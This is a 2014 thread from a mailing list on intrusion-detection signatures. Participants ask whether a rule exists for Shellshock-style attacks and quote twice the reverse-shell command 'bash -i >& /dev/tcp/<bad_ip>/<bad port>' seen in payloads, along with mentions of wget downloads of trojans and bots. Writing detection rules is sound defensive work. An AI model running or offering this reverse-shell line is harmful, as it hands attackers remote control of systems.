[Emerging-Sigs] Do you have a rule for this?
livio at metaflows.com
Fri Sep 26 14:41:05 EDT 2014
Yes, we are seeing all kinds of stuff..
But I would think a rule for this would be good independently of the
bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1
in the payload is probably very bad..
On 09/26/2014 11:25 AM, Will Metcalf wrote:
> Was thinking about this, and also curl/wget/etc with args inbound to
> web_servers. Have also seen direct wget's for ELF bins, Perl DDoS
> bots, Perl Downloaders etc.
> On Fri, Sep 26, 2014 at 1:19 PM, Livio Ricciulli <livio at metaflows.com
> <mailto:livio at metaflows.com>> wrote:
> We have been seeing the bash exploit trying to execute:
> bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1
> This will give the bad_ip a shell to the attacker. They would
> typically execute a wget followed by Trojan install.
> I was wondering do you already have a rule that detects the above?
> if someone was executing that in anything would be bad I think..
> Emerging-sigs mailing list
> Emerging-sigs at lists.emergingthreats.net
> <mailto:Emerging-sigs at lists.emergingthreats.net>
> Support Emerging Threats! Subscribe to Emerging Threats Pro
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the Emerging-sigs